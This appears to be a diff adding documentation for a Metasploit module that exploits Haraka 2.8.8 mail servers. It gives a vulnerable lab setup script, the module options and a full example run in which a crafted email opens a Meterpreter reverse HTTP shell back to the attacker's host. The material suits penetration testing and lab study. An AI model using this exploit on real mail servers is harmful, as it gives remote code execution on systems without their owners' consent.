|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | + Setup the vulnerable Haraka install by running this script on Ubuntu, Debian or similar: |
| 4 | + |
| 5 | + ``` |
| 6 | + #install nodejs and npm |
| 7 | + curl -sL https://deb.nodesource.com/setup_7.x | sudo -E bash - |
| 8 | + sudo apt install nodejs |
| 9 | +
|
| 10 | + #Haraka setup |
| 11 | + wget https://github.com/haraka/Haraka/archive/v2.8.8.tar.gz |
| 12 | + tar xvzf v2.8.8.tar.gz |
| 13 | + cd Haraka-2.8.8/ |
| 14 | + npm install npm |
| 15 | + npm install |
| 16 | +
|
| 17 | + haraka -i haraka |
| 18 | +
|
| 19 | + cat << EOF > haraka/config/plugins |
| 20 | + access |
| 21 | + rcpt_to.in_host_list |
| 22 | + data.headers |
| 23 | + attachment |
| 24 | + test_queue |
| 25 | + max_unrecognized_commands |
| 26 | + EOF |
| 27 | +
|
| 28 | + echo haraka.test >> haraka/config/host_list |
| 29 | +
|
| 30 | + # Launch haraka as root |
| 31 | + sudo haraka -c haraka |
| 32 | + ``` |
| 33 | + |
| 34 | +## Options |
| 35 | + |
| 36 | + **from_email** |
| 37 | + |
| 38 | + String used in the SMTP MAILFROM command |
| 39 | + |
| 40 | + **to_email** |
| 41 | + |
| 42 | + String used in the SMTP MAILTO command |
| 43 | + |
| 44 | + **lhost** |
| 45 | + |
| 46 | + The address to serve the payload from |
| 47 | + |
| 48 | + **rhost** |
| 49 | + |
| 50 | + The address or hostname to target |
| 51 | + |
| 52 | + **payload** |
| 53 | + |
| 54 | + Any compatible Metasploit payload |
| 55 | + |
| 56 | +## Example Run |
| 57 | + |
| 58 | + ``` |
| 59 | +msf > use exploit/linux/smtp/harakiri |
| 60 | +msf exploit(haraka) > set email_to [email protected] |
| 61 | + |
| 62 | +msf exploit(haraka) > set payload linux/x64/meterpreter_reverse_http |
| 63 | +payload => linux/x64/meterpreter_reverse_http |
| 64 | +msf exploit(haraka) > run |
| 65 | +
|
| 66 | +[*] Started HTTP reverse handler on http://192.168.1.1:8080 |
| 67 | +[*] Exploiting... |
| 68 | +[*] Using URL: http://192.168.1.1:8080/36CacHfIIBnBe3 |
| 69 | +[*] Sending mail to target server... |
| 70 | +[*] http://192.168.1.1:8080 handling request from 192.168.1.2; (UUID: xoljaxxi) Redirecting stageless connection from /UJgmNdAvcM7RkNeSiIMMwg_phj2ODD0I0sgpuoWRXMCMYpHwI0ydcMlb4vVjgylZF9yr-gOpQu9aOibLROCaSBoN0tLHJRGCK0B4ZKg1aQy8LPB with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko' |
| 71 | +[*] http://192.168.1.1:8080 handling request from 192.168.1.2; (UUID: xoljaxxi) Attaching orphaned/stageless session... |
| 72 | +[*] Meterpreter session 2 opened (192.168.1.1:8080 -> 192.168.1.2:42122) at 2017-05-10 22:41:06 -0500 |
| 73 | +[*] Command Stager progress - 100.00% done (120/120 bytes) |
| 74 | +[*] Server stopped. |
| 75 | +
|
| 76 | +meterpreter > exit |
| 77 | +[*] Shutting down Meterpreter... |
| 78 | +
|
| 79 | +[*] 192.168.1.2 - Meterpreter session 2 closed. Reason: User exit |
| 80 | +msf exploit(haraka) > |
| 81 | + ``` |
0 commit comments